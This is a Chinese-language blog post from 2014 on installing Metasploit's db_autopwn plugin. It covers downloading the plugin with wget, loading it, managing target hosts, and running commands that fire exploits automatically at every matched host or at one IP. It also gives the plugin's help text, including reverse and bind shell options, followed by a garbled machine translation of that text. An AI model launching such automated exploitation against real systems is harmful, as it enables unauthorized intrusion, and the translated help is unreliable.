注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

c32's blog

每天学习一点点,每天进步一点点.

 
 
 
 
 

日志

 
 

继安装完metasploit之后安装db_autopwn模块插件  

2014-07-22 15:59:44|  分类: metasploit |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
metasploit教程
http://cx7863.blog.163.com/blog/static/228650026201462292624487/
安装完metasploit后那么就要开始安装db_autopwn了
首先下载db_autopwn
wget http://www.saoyu.com/wp-content/uploads/2012/12/db_autopwn.zip
wget http://c32.19aq.com/Soft/db_autopwn.zip
或者http://download.csdn.net/detail/ximihuan/4525936
然后移动文件到metasploit下的/plugins/目录下
找不到目录的可以
find / -name plugins
然后使用load db_autopwn.rb
继安装完metasploit之后安装db_autopwn模块插件 - c32 - c32s blog
 提示成功

查看数据库中目标信息

db_hosts

删除数据库中ip可以使用命令

db_hosts -d ip          // -d后不接IP为删除所有

上述的扫描工作做好以后就可以使用db_autopwn来自动化攻击

db_autopwn -t -p -e(自动工具所有的ip)

db_autopwn -t -p -I ip -e(攻击指定的ip主机) 



db_autopwn帮助
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
======================================================

用法_ [×] [选项] autopwn分贝

H显示帮助文本

显示所有匹配的T模的开发

X选择模块基于漏洞

P选择基于开放端口模块

所有匹配的电子发射攻击目标

R的使用反向连接

AB使用随机端口绑定(默认)

Q输出禁用模块的开发

R只读运行最小

[范围]范围的主机的漏洞

X [范围]范围的主机拒绝

[范围]利用PI只读端口开放的主机论文

过氧化物酶[范围]总是排除主机端口开放论文

[ M ]只读运行正则表达式正则表达式匹配模块名叫

T secs ] [最大运行任何漏洞

  评论这张
 
阅读(43)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017